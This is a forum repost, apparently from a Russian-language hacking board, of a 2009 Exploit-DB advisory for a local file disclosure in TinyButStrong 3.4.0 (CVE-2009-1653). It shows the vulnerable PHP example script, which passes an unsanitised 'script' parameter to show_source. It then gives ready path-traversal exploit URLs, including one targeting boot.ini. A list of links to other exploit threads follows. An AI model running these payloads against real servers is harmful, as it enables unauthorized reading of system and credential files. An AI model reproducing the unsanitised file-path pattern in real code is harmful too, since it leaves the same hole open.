Exploit TinyButStrong 3.4.0 - 'script' Local File Disclosure

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8667
Проверка EDB
  1. Пройдено
Автор
AHMADBADY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-1653
Дата публикации
2009-05-13
Код: 
                              (  ' )-.          ,~'`-.
                                       ,~' `  ' ) )       _(   _) )
                                      ( ( .--.===.--.    (  `    ' )
                                       `.%%.      .#`.   `-'`~~=~'
                                       /%%/         \##\
                                      |%%/  local    \##|
                                      |%%|           |##|.,-.
                                      \%%|  file     |##/    )_
                                       \%\           /#/ ( `'  )
                                        \%\ include /#/(  ,  -'`-.
                                    ,~-. `%\       /#'(  (     ') )
                                   (  ) )_ `\__|__/'   `~-~=--~~='
                                  ( ` ')  ) [-=-=-]
                                 (_(_.~~~'   \|_|/ 
                                             [***]
                              \|||/
                              (o o) 
-=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=-   
                       |                 |    
                       |                 |                                      

script:TinyButStrong version 3.4.0
-------------------------------------------------
Author: ahmadbady 
email: kivi_hacker666@yahoo.com
my site:Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--=
vul:/examples/tbs_us_examples_0view.php

<?php
if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ;
show_source('tbs_us_examples_'.$_GET['script']) ;
exit ;
?>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
xpl:

path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini

path/examples/tbs_us_examples_0view.php?script=[local_file]
-=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-=-=-        
                            |__|__|
                             || ||
                             OoO OoO

# milw0rm.com [2009-05-13]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Match Clone Script 1.0.4 - Cross-Site Scripting
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Test Script 2.0.7 - 'cid' SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Entrepreneur Dating Script 2.0.2 - Authentication Bypass
Ответы
0
Просмотры
852
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Bus Booking Script 1.0 - 'txtname' SQL Injection
Ответы
0
Просмотры
889
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Muslim Matrimonial Script 3.02 - 'succid' SQL Injection
Ответы
0
Просмотры
840
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Resume Clone Script 2.0.5 - SQL Injection
Ответы
0
Просмотры
876
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Car Rental Script 2.0.4 - 'val' SQL Injection
Ответы
0
Просмотры
849
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection
Ответы
0
Просмотры
888
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection
Ответы
0
Просмотры
866
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу